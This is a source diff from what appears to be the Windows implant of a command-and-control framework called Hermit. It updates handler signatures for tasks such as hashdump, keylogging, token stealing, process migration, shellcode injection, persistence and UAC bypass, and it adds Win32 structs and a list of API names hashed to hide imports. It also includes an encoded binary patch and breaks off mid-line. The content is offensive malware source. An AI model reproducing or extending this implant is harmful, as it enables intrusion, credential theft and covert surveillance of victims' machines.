Helper::Token @@ -143,16 +146,16 @@ namespace Task std::wstring GroupLs(State::PSTATE pState); std::wstring Hashdump(State::PSTATE pState); std::wstring History(State::PSTATE pState); - std::wstring Ip(); + std::wstring Ip(State::PSTATE pState); std::wstring JitterSet(State::PSTATE pState, const std::wstring& wJitter); - std::wstring KeyLog(const std::wstring& wLogTime); + std::wstring KeyLog(State::PSTATE pState, const std::wstring& wLogTime); std::wstring Kill(State::PSTATE pState); std::wstring KillDateSet(State::PSTATE pState, const std::wstring& wKillDate); std::wstring Ls(State::PSTATE pState, const std::wstring& wDir); std::wstring Migrate(State::PSTATE pState, const std::wstring& wPid); std::wstring Mkdir(State::PSTATE pState, const std::wstring& wDir); std::wstring Mv(State::PSTATE pState, const std::wstring& wSrc, const std::wstring& wDest); - std::wstring Net(); + std::wstring Net(State::PSTATE pState); std::wstring Pe(State::PSTATE pState, const std::wstring& wTargetProcess, const std::wstring& wSrc, const std::wstring& wTechnique); std::wstring Persist(State::PSTATE pState, const std::wstring& wTechnique); std::wstring Procdump(State::PSTATE pState, const std::wstring& wPid); @@ -161,7 +164,7 @@ namespace Task std::wstring Pwd(State::PSTATE pState); std::wstring RegQuery(State::PSTATE pState, const std::wstring& wRootKey, const std::wstring& wSubKey, BOOL bRecursive); std::wstring Rm(State::PSTATE pState, const std::wstring& wFile); - std::wstring Rmdir(const std::wstring& wDir); + std::wstring Rmdir(State::PSTATE pState, const std::wstring& wDir); std::wstring RportfwdAdd(State::PSTATE pState, const std::wstring& wLIP, const std::wstring& wLPort, const std::wstring& wFwdIP, const std::wstring& wFwdPort); std::wstring RportfwdLs(State::PSTATE pState); std::wstring RportfwdRm(State::PSTATE pState); @@ -169,7 +172,7 @@ namespace Task std::wstring Screenshot(State::PSTATE pState); std::wstring Shellcode(State::PSTATE pState, const std::wstring& wPid, const std::wstring& wSrc, const std::wstring& wTechnique); std::wstring SleepSet(State::PSTATE pState, const std::wstring& wSleep); - std::wstring TokenRevert(); + std::wstring TokenRevert(State::PSTATE pState); std::wstring TokenSteal(State::PSTATE pState, const std::wstring& wPid, const std::wstring& wProcName, bool bLogin); std::wstring Uac(State::PSTATE pState, const std::wstring& wTechnique); std::wstring Upload(State::PSTATE pState, const std::wstring& wSrc, const std::wstring& wDest); diff --git a/payload/win/implant/include/core/win32.hpp b/payload/win/implant/include/core/win32.hpp index 76c85f0..3544a81 100644 --- a/payload/win/implant/include/core/win32.hpp +++ b/payload/win/implant/include/core/win32.hpp @@ -1,6 +1,329 @@ #ifndef HERMIT_CORE_WIN32_HPP #define HERMIT_CORE_WIN32_HPP -typedef DWORD NET_API_STATUS; +#define MAX_DNS_SUFFIX_STRING_LENGTH 256 +#define MAX_ADAPTER_ADDRESS_LENGTH 8 +#define MAX_DHCPV6_DUID_LENGTH 130 -#endif // HERMIT_CORE_WIN32_HPP \ No newline at end of file +// ------------------------------------------------------------------ +// ifdef.h +// ------------------------------------------------------------------ + +typedef DWORD NET_API_STATUS; +typedef ULONG NET_IFINDEX; +typedef NET_IFINDEX IF_INDEX; +typedef ULONG IFTYPE; +typedef UINT32 NET_IF_COMPARTMENT_ID; + +typedef enum { + IfOperStatusUp = 1, + IfOperStatusDown, + IfOperStatusTesting, + IfOperStatusUnknown, + IfOperStatusDormant, + IfOperStatusNotPresent, + IfOperStatusLowerLayerDown +} IF_OPER_STATUS; + +typedef enum _NET_IF_CONNECTION_TYPE { + NET_IF_CONNECTION_DEDICATED = 1, + NET_IF_CONNECTION_PASSIVE = 2, + NET_IF_CONNECTION_DEMAND = 3, + NET_IF_CONNECTION_MAXIMUM = 4 +} NET_IF_CONNECTION_TYPE, *PNET_IF_CONNECTION_TYPE; + +// ------------------------------------------------------------------ +// iphlpapi.h +// ------------------------------------------------------------------ + +#define GAA_FLAG_INCLUDE_PREFIX 0x0010 + +typedef union _NET_LUID_LH { + ULONG64 Value; + struct { + ULONG64 Reserved : 24; + ULONG64 NetLuidIndex : 24; + ULONG64 IfType : 16; + } Info; +} NET_LUID_LH, *PNET_LUID_LH; +typedef union _NET_LUID_LH NET_LUID_LH; +typedef NET_LUID_LH NET_LUID; +typedef NET_LUID IF_LUID; + +typedef enum { + IpPrefixOriginOther = 0, + IpPrefixOriginManual, + IpPrefixOriginWellKnown, + IpPrefixOriginDhcp, + IpPrefixOriginRouterAdvertisement +} IP_PREFIX_ORIGIN; + +typedef enum { + NlsoOther = 0, + NlsoManual, + NlsoWellKnown, + NlsoDhcp, + NlsoLinkLayerAddress, + NlsoRandom, + IpSuffixOriginOther = 0, + IpSuffixOriginManual, + IpSuffixOriginWellKnown, + IpSuffixOriginDhcp, + IpSuffixOriginLinkLayerAddress, + IpSuffixOriginRandom, + IpSuffixOriginUnchanged = 1 << 4 +} NL_SUFFIX_ORIGIN; + +typedef enum { + NldsInvalid, + NldsTentative, + NldsDuplicate, + NldsDeprecated, + NldsPreferred, + IpDadStateInvalid = 0, + IpDadStateTentative, + IpDadStateDuplicate, + IpDadStateDeprecated, + IpDadStatePreferred, +} NL_DAD_STATE; + +typedef enum { + TUNNEL_TYPE_NONE = 0, + TUNNEL_TYPE_OTHER = 1, + TUNNEL_TYPE_DIRECT = 2, + TUNNEL_TYPE_6TO4 = 11, + TUNNEL_TYPE_ISATAP = 13, + TUNNEL_TYPE_TEREDO = 14, + TUNNEL_TYPE_IPHTTPS = 15 +} TUNNEL_TYPE, *PTUNNEL_TYPE; + +typedef NL_SUFFIX_ORIGIN IP_SUFFIX_ORIGIN; +typedef NL_DAD_STATE IP_DAD_STATE; + +// typedef struct _GUID { +// unsigned long Data1; +// unsigned short Data2; +// unsigned short Data3; +// unsigned char Data4[8]; +// } GUID; + +typedef GUID NET_IF_NETWORK_GUID; + +typedef struct _MY_SOCKET_ADDRESS { + LPSOCKADDR lpSockaddr; + INT iSockaddrLength; +} MY_SOCKET_ADDRESS, *PMY_SOCKET_ADDRESS, *LPMY_SOCKET_ADDRESS; + +typedef struct _IP_ADAPTER_UNICAST_ADDRESS_LH { + union { + ULONGLONG Alignment; + struct { + ULONG Length; + DWORD Flags; + }; + }; + struct _IP_ADAPTER_UNICAST_ADDRESS_LH *Next; + MY_SOCKET_ADDRESS Address; + IP_PREFIX_ORIGIN PrefixOrigin; + IP_SUFFIX_ORIGIN SuffixOrigin; + IP_DAD_STATE DadState; + ULONG ValidLifetime; + ULONG PreferredLifetime; + ULONG LeaseLifetime; + UINT8 OnLinkPrefixLength; +} IP_ADAPTER_UNICAST_ADDRESS_LH, *PIP_ADAPTER_UNICAST_ADDRESS_LH; + +typedef IP_ADAPTER_UNICAST_ADDRESS_LH IP_ADAPTER_UNICAST_ADDRESS; +typedef IP_ADAPTER_UNICAST_ADDRESS_LH *PIP_ADAPTER_UNICAST_ADDRESS; + +typedef struct _IP_ADAPTER_ANYCAST_ADDRESS_XP { + union { + ULONGLONG Alignment; + struct { + ULONG Length; + DWORD Flags; + }; + }; + struct _IP_ADAPTER_ANYCAST_ADDRESS_XP *Next; + MY_SOCKET_ADDRESS Address; +} IP_ADAPTER_ANYCAST_ADDRESS_XP, *PIP_ADAPTER_ANYCAST_ADDRESS_XP; + +typedef IP_ADAPTER_ANYCAST_ADDRESS_XP IP_ADAPTER_ANYCAST_ADDRESS; +typedef IP_ADAPTER_ANYCAST_ADDRESS_XP *PIP_ADAPTER_ANYCAST_ADDRESS; + +typedef struct _IP_ADAPTER_MULTICAST_ADDRESS_XP { + union { + ULONGLONG Alignment; + struct { + ULONG Length; + DWORD Flags; + }; + }; + struct _IP_ADAPTER_MULTICAST_ADDRESS_XP *Next; + MY_SOCKET_ADDRESS Address; +} IP_ADAPTER_MULTICAST_ADDRESS_XP, *PIP_ADAPTER_MULTICAST_ADDRESS_XP; + +typedef IP_ADAPTER_MULTICAST_ADDRESS_XP IP_ADAPTER_MULTICAST_ADDRESS; +typedef IP_ADAPTER_MULTICAST_ADDRESS_XP *PIP_ADAPTER_MULTICAST_ADDRESS; + +typedef struct _IP_ADAPTER_DNS_SERVER_ADDRESS_XP { + union { + ULONGLONG Alignment; + struct { + ULONG Length; + DWORD Reserved; + }; + }; + struct _IP_ADAPTER_DNS_SERVER_ADDRESS_XP *Next; + MY_SOCKET_ADDRESS Address; +} IP_ADAPTER_DNS_SERVER_ADDRESS_XP, *PIP_ADAPTER_DNS_SERVER_ADDRESS_XP; + +typedef IP_ADAPTER_DNS_SERVER_ADDRESS_XP IP_ADAPTER_DNS_SERVER_ADDRESS; +typedef IP_ADAPTER_DNS_SERVER_ADDRESS_XP *PIP_ADAPTER_DNS_SERVER_ADDRESS; + +typedef struct _IP_ADAPTER_PREFIX_XP { + union { + ULONGLONG Alignment; + struct { + ULONG Length; + DWORD Flags; + }; + }; + struct _IP_ADAPTER_PREFIX_XP *Next; + MY_SOCKET_ADDRESS Address; + ULONG PrefixLength; +} IP_ADAPTER_PREFIX_XP, *PIP_ADAPTER_PREFIX_XP; + +typedef IP_ADAPTER_PREFIX_XP IP_ADAPTER_PREFIX; +typedef IP_ADAPTER_PREFIX_XP *PIP_ADAPTER_PREFIX; + +typedef struct _IP_ADAPTER_WINS_SERVER_ADDRESS_LH { + union { + ULONGLONG Alignment; + struct { + ULONG Length; + DWORD Reserved; + }; + }; + struct _IP_ADAPTER_WINS_SERVER_ADDRESS_LH *Next; + MY_SOCKET_ADDRESS Address; +} IP_ADAPTER_WINS_SERVER_ADDRESS_LH, *PIP_ADAPTER_WINS_SERVER_ADDRESS_LH; + +typedef struct _IP_ADAPTER_GATEWAY_ADDRESS_LH { + union { + ULONGLONG Alignment; + struct { + ULONG Length; + DWORD Reserved; + }; + }; + struct _IP_ADAPTER_GATEWAY_ADDRESS_LH *Next; + MY_SOCKET_ADDRESS Address; +} IP_ADAPTER_GATEWAY_ADDRESS_LH, *PIP_ADAPTER_GATEWAY_ADDRESS_LH; + +typedef struct _IP_ADAPTER_DNS_SUFFIX { + struct _IP_ADAPTER_DNS_SUFFIX *Next; + WCHAR String[MAX_DNS_SUFFIX_STRING_LENGTH]; +} IP_ADAPTER_DNS_SUFFIX, *PIP_ADAPTER_DNS_SUFFIX; + +typedef struct _IP_ADAPTER_ADDRESSES_LH { + union { + ULONGLONG Alignment; + struct { + ULONG Length; + IF_INDEX IfIndex; + }; + }; + struct _IP_ADAPTER_ADDRESSES_LH *Next; + PCHAR AdapterName; + PIP_ADAPTER_UNICAST_ADDRESS_LH FirstUnicastAddress; + PIP_ADAPTER_ANYCAST_ADDRESS_XP FirstAnycastAddress; + PIP_ADAPTER_MULTICAST_ADDRESS_XP FirstMulticastAddress; + PIP_ADAPTER_DNS_SERVER_ADDRESS_XP FirstDnsServerAddress; + PWCHAR DnsSuffix; + PWCHAR Description; + PWCHAR FriendlyName; + BYTE PhysicalAddress[MAX_ADAPTER_ADDRESS_LENGTH]; + ULONG PhysicalAddressLength; + union { + ULONG Flags; + struct { + ULONG DdnsEnabled : 1; + ULONG RegisterAdapterSuffix : 1; + ULONG Dhcpv4Enabled : 1; + ULONG ReceiveOnly : 1; + ULONG NoMulticast : 1; + ULONG Ipv6OtherStatefulConfig : 1; + ULONG NetbiosOverTcpipEnabled : 1; + ULONG Ipv4Enabled : 1; + ULONG Ipv6Enabled : 1; + ULONG Ipv6ManagedAddressConfigurationSupported : 1; + }; + }; + ULONG Mtu; + IFTYPE IfType; + IF_OPER_STATUS OperStatus; + IF_INDEX Ipv6IfIndex; + ULONG ZoneIndices[16]; + PIP_ADAPTER_PREFIX_XP FirstPrefix; + ULONG64 TransmitLinkSpeed; + ULONG64 ReceiveLinkSpeed; + PIP_ADAPTER_WINS_SERVER_ADDRESS_LH FirstWinsServerAddress; + PIP_ADAPTER_GATEWAY_ADDRESS_LH FirstGatewayAddress; + ULONG Ipv4Metric; + ULONG Ipv6Metric; + IF_LUID Luid; + MY_SOCKET_ADDRESS Dhcpv4Server; + NET_IF_COMPARTMENT_ID CompartmentId; + NET_IF_NETWORK_GUID NetworkGuid; + NET_IF_CONNECTION_TYPE ConnectionType; + TUNNEL_TYPE TunnelType; + MY_SOCKET_ADDRESS Dhcpv6Server; + BYTE Dhcpv6ClientDuid[MAX_DHCPV6_DUID_LENGTH]; + ULONG Dhcpv6ClientDuidLength; + ULONG Dhcpv6Iaid; + PIP_ADAPTER_DNS_SUFFIX FirstDnsSuffix; +} IP_ADAPTER_ADDRESSES_LH, *PIP_ADAPTER_ADDRESSES_LH; + +typedef IP_ADAPTER_ADDRESSES_LH IP_ADAPTER_ADDRESSES; +typedef IP_ADAPTER_ADDRESSES_LH *PIP_ADAPTER_ADDRESSES; + +// ------------------------------------------------------------------ +// tcpmib.h +// ------------------------------------------------------------------ + +#define ANY_SIZE 1 + +typedef enum +{ + MIB_TCP_STATE_CLOSED = 1, + MIB_TCP_STATE_LISTEN = 2, + MIB_TCP_STATE_SYN_SENT = 3, + MIB_TCP_STATE_SYN_RCVD = 4, + MIB_TCP_STATE_ESTAB = 5, + MIB_TCP_STATE_FIN_WAIT1 = 6, + MIB_TCP_STATE_FIN_WAIT2 = 7, + MIB_TCP_STATE_CLOSE_WAIT = 8, + MIB_TCP_STATE_CLOSING = 9, + MIB_TCP_STATE_LAST_ACK = 10, + MIB_TCP_STATE_TIME_WAIT = 11, + MIB_TCP_STATE_DELETE_TCB = 12, +} MIB_TCP_STATE; + +typedef struct _MIB_TCPROW { + union { + DWORD dwState; + MIB_TCP_STATE State; + }; + DWORD dwLocalAddr; + DWORD dwLocalPort; + DWORD dwRemoteAddr; + DWORD dwRemotePort; +} MIB_TCPROW, *PMIB_TCPROW; + +typedef struct _MIB_TCPTABLE { + DWORD dwNumEntries; + MIB_TCPROW table[ANY_SIZE]; +} MIB_TCPTABLE, *PMIB_TCPTABLE; + +#endif // HERMIT_CORE_WIN32_HPP diff --git a/payload/win/implant/script/calc_hash_func.py b/payload/win/implant/script/calc_hash_func.py index 3e55ce4..c7608af 100644 --- a/payload/win/implant/script/calc_hash_func.py +++ b/payload/win/implant/script/calc_hash_func.py @@ -67,31 +67,56 @@ "CreateFileW", "CreatePipe", "CreateProcessW", + "CreateProcessWithLogonW", + "CreateProcessWithTokenW", "CreateRemoteThreadEx", "CreateThreadpoolWait", + "CreateWindowExW", "CryptBinaryToStringW", "CryptStringToBinaryW", + "DeleteFileW", + "DispatchMessage", "DllMain", + "DuplicateTokenEx", "ExpandEnvironmentStringsW", + "FindClose", "FindFirstFileW", "FindNextFileW", + "FormatMessage", "FreeEnvironmentStringsW", + "GetAdaptersAddresses", "GetComputerNameW", "GetEnvironmentStringsW", + "GetForegroundWindow", "GetLastError", + "GetMessage", "GetModuleFileNameW", "GetProcAddress", "GetProcessHeap", + "GetProcessImageFileNameW", "GetSystemDirectoryW", + "GetSystemMetrics", + "GetTcpTable", + "GetTokenInformation", "GetUserNameW", + "GlobalAlloc", + "GlobalFree", "HeapAlloc", "HeapFree", + "ImpersonateLoggedOnUser", "IsDebuggerPresent", + "LoadAcceleratorsW", + "LoadCursorW", + "LoadIconW", "LoadLibraryA", "LoadLibraryW", + "LocalFree", + "LookupPrivilegeNameW", "LookupPrivilegeValueW", "MessageBoxA", "MessageBoxW", + "MiniDumpWriteDump", + "MoveFileW", "NetApiBufferFree", "NetLocalGroupEnum", "NetUserEnum", @@ -102,15 +127,27 @@ "ReadFile", "ReadProcessMemory", "RegCloseKey", + "RegCreateKeyExW", "RegEnumKeyExW", + "RegEnumValueW", + "RegisterClassExW", "RegOpenKeyExW", "RegQueryInfoKeyW", + "RegSaveKeyW", + "RegSetValueExW", + "RemoveDirectoryW", + "RevertToSelf", "RtlAddFunctionTable", "RtlCopyMemory", "SetFileInformationByHandle", "SetHandleInformation", "SetThreadpoolWait", + "ShellExecuteExW", + "ShowWindow", "TerminateProcess", + "TranslateAcceleratorW", + "TranslateMessage", + "UpdateWindow", "VirtualAlloc", "VirtualAllocEx", "VirtualProtect", diff --git a/payload/win/implant/script/calc_hash_module b/payload/win/implant/script/calc_hash_module index b53967a5270422c1a0ec2e78a670844e8ad4690c..ecc97b95a02b3ce72cf122f10fa93ae0270aa588 100755 GIT binary patch delta 6968 zcmaKx0a#SWwa4!c3#^EWh{)U6jadyvge#&VHC0yyyrG(qhy)E{Bw*2J4As>bV_ZeB zu87a(#3r?Vwo&UNK0iN`^)=RyTBAO()FAO83NZ*m%mytbXe>1*_x)H#77~xB|sFv_O&xv*qX&dW^ zNLf;G{hi7Ewx0aeV@H1dbSP8(F+cEa52&=V@I+s_t;xpzJjNG0cu%B9V~Ucmm06$U zaWrqLf7~gpyj1yK*EMgIKQs`^^3o#SEFZcIHh*}+u&dI%^>?)2Y2Gf)+g%powQ1!p zt5*KJb!K5 z<|x}`pgeV>RzBd^4|z^C$mBTp<#*rbd6b?q?5q5#4|sEz(JY^X0i_8>-h6=nsz}|m zUHYvtR2WqGtBq#H1B}U-ZOraJMc1b%cqHz?W|-{CFnXoudfu@}xH3A>bQwvR6QsSP z?H<)g;|y{$oSN%tjPB%ld7~aCTjg*6hpulnmd3LAk9^&1gLZttJyeyRN6W~^bWvJs zERq0%pAO>QN{>IH_4uoWnos`Le1tOkVeSkz%>BaL0JMkr47{bCLTlhDBlMbqTA5IL zjdm|jhj|2Z?WKQXey;>69;M{e>TNI(P!#_pTT@U>AJvT%AQ{~rkb^7rTZ;2ynsfIi~Y@4d>0W@DTEt=&`? z7Z<-F(@4($9nZZyFxP1EtP2e3oK_Y%S(@DcJH^Kr4H*GPw+3issebP3{ykmaNsA{& z_|C-VTdd`1@)k`S8yxukUD-#A#{O}%A1%%MF$Nyjyr+%BblpGm8z?uwc}j5)MaL=b zaSWv~7wt8?hI5W09hLtrIR;lK%8p z!!eJAg)tJ0!4mt2!L8}#DIP*>o(rP?FCBC%X`a>HfhBl%N;EB-6m1>F8%N_KsVT+g z`*2d0B{=k!u7B)*+z2)CM=x5fqx>*Qm^hT)pE8ww@+EyWWk0Lr9h582N=Pz#SN$ntHnc9D}(HqmVtt}WuW0NC&f1Tcs zv6C&-J#!Pg)$DsCWg-i-Hi??B)5Ww@me53zvkFGN{yChsT{D7piYqxlv+$cafLFwB zbn_aErvI8%%=9*TS{w1i9mJjOHEQrE`gw}IYbEY;+NPag8K3#mo<0%eJ2kY>@>Yh8 ze$S%FmJvfAv8a%|msh@CSFQ*S!M1P|-K2f%Z^v}=xX<@SgrXRjMBWt^cQt5+4Qe3(W=|JRnTD0I8cG=@?_ zMzW`*M%OO{D2nw{UB3%PfT31g82_#7$IyPIPS?+(U42>CJ3&Xit{=sPa-~7ne;lqT z@r}Bk1Ezta(4PaQfUko2;1RF{yb2xwqdwF1FpN(I69RFoW<$t;Vl7w%z60`St`h79 zW3iX~8che2!7X4mco19*^1a>zR$%AOg6B~ce()w}!^>d3uIn*iEU1B5U?I2`+#2jr zly@OiKv4mn2akh((Af+JHbrrPG2j|d11npQDEI}q6AZn96#)~$TJR;X6Wj(y^i!0> z-~_M>wVVUaK((z0-vak|ARL2G37!G3feqjTuoD~}qA2PYSZXi@%mEjG>%l^B4_FLV zf|tN%umx25E6Tu|*b*=qOaarud@u(r0at*Y0}whOoCkl|uIsnKb}%$lQR;B$6TmJo z0}Q*3nS;-RJHhSXF>oJP2j=4X=?2$>Q3J4|U^2J`*GWED50-$p!2=-so9@xiLKuOI zs11Axv<_612e{c{z;J%!feXMwa0|ElJTcwi zK`?4CY6wgQ8^LVQhPP}j_yV{GTn$!&KOYR?8ie1055P0`sB3Pt{rp8;kLIU6B^X{6 zWfcA<;O}TPC1yq^+CIS{;(GZ-fNm~BUxeSj<~JO|cKq4vX-BR-=rF{vdODQpU;*`1 z4LIwm9f+%^ka-UF-bIR?7t1cyQWjcDJ#EOc)6RKTQ#{%u*7k^<^9Hd`W5|*48Q2R%*V9RX zrYt9O)f0Omnq8}>*cY7a>J@tC1qZ9YLMwo}E3^Y>yh2BSn^&j?@L!=0fq~f$K0pP| zV;m5El~w>@S7`?jeU*-6N3)a$EPIz|Z!~r*AL3<0j4pwA0j{R>4&^o?8Ebj~{q17ZS%}SsnAQfd9;0wDdJ;_S8D+&K zcNYEj-u=&s{t?iPLjTD|YFg|d*Naw5I}#j5IWO8+LnAGD(aCNg%pz13%x*W*GY~I8 zY!c#ah_zgdd@IMsPB&6Wj*~e)BQ?kA+=r`qZttKh-H6JAx=|+eO|%l$d#+=*?Q}H9 z%61E}7UH|tsXoWSPF$yZu&KR{wTh&Kg*JBXI!#{aWVy|hyU@XMnrQ=2*i3sD#xi>g zRil;OVytW^E=iXV;~*xr@Hj!UAx>za4!CJPz`YJ z2Fx5RvK71MU{S540s~tyTO6BKS^;!n9Pj|+L|+Xsyp=i@IawjMv9akichSEa{jc`! zXG;tNekvny`?j|t<;aj2G+lTF?zU3m;#fv)l)Ko$wzSa(U~L=i1=h9ENnmRms>8{A zZARv!P-q`O#MDwC?ibp8i0>Jqrv&0}@Td*#oy6>(BoCmUs&qZ8cR!o+Fv+v%|1d8^aXBjQCobB#Vg_3_cGlOD|@9s9=hb#j8HeU;RsTDn%}dXCHx z!!!Y9C|>(;3_I~dq2TW(|Lo9ncUyie+U)|$WvQPbx5!L>Is|V2KrUyjw0}qHcNmX` zLKoMJ&O6*^;=dgt#um#ZH@7_yKPb3Qrz)J8Q+iqI-Lk@`%2+q0J|mSDyr$ak$*Gz< z9)>OB?$*qredwN?CWe`relNQ###8%ixp^~WP?0w-58P?tY_Q@sS55}~cj&oSyEqPt z9HvC$df@u;a{r!`_RmOta}pg|tJ)7s|1wu)5-N!gi<(AVYts_9%Uw3J`0_E)t;uLb z((C)UJ^8Tc3AF5W)n4fmdI{y&4@7s&RQm9BHGPfTJTuoitT-Qiu1~EE$BJ`(hYUYi zMmr((8A%ko?wQ8BZWR&X7`G8w@m7t zvYcE}e^BbHQ)t~AX^AzmBIRi1<|yGVK~|4hRq@y%KG_*6b-kgohZj8{MlsTEj)gbi;cYG`|DMEw7e+IOXod| z=iQse(~LJ&&%3fpP^re(gy({HyJdFMq+UUr>sQG8(!A13rGBuiVe{~INPXYKn}Rjt zem06i@hE3xfNip)T9&7oP#6sPfCnyNxJO?26;dCPEc71fr(~?K@4LKTO8rz>L6wGm zCSG$~5j?dRCyl8|RP9kcefRt|ypr7NklY=!Mrx$KyU&9=07-EB zOj$c-aTG}XHOz&7^6^zFq<))N?3qeMfG{Y4WA5mN{FMgjuK@_r<|_Wk|vvD7b;#WqxW9f4bfXE9Rh%{AX8^|II=*4k%MFZXDO zVh(urDdEUDlMZc4v;S6ZvHWGF^ux==3Ph^h8A9-&_I3I$ap| zeS&95ecyWcmDER!BUYl?Ps(jJr+*Qb0gt`cMd>9ftBdokD_Qb1%N$8JK2bx=XUeUS xy(VqIZi`HUgIa=z(8ijukY4|1Yj;gjNb)>klsu0b(Hx#Hn#1#b_KOGE{{VvslEMH0 delta 7148 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 myMap; - char modules[7][30] = { + char modules[9][30] = { "bcrypt.dll", "crypt32.dll", + "dbghelp.dll", + "iphlpapi.dll", "kernel32.dll", "netapi32.dll", "ntdll.dll", @@ -50,7 +52,7 @@ int main() "winhttp.dll", }; - for (int i = 0; i < 7; i++) + for (int i = 0; i < 9; i++) { char* moduleUpper = toUpper(modules[i]); diff --git a/payload/win/implant/src/core/handler.cpp b/payload/win/implant/src/core/handler.cpp index 60212bc..124a843 100644 --- a/payload/win/implant/src/core/handler.cpp +++ b/payload/win/implant/src/core/handler.cpp @@ -236,13 +236,13 @@ namespace Handler wTaskResult = Task::History(pState); break; case TASK_IP: - wTaskResult = Task::Ip(); + wTaskResult = Task::Ip(pState); break; case TASK_JITTER: wTaskResult = Task::JitterSet(pState, Utils::Convert::UTF8Decode(args["time"])); break; case TASK_KEYLOG: - wTaskResult = 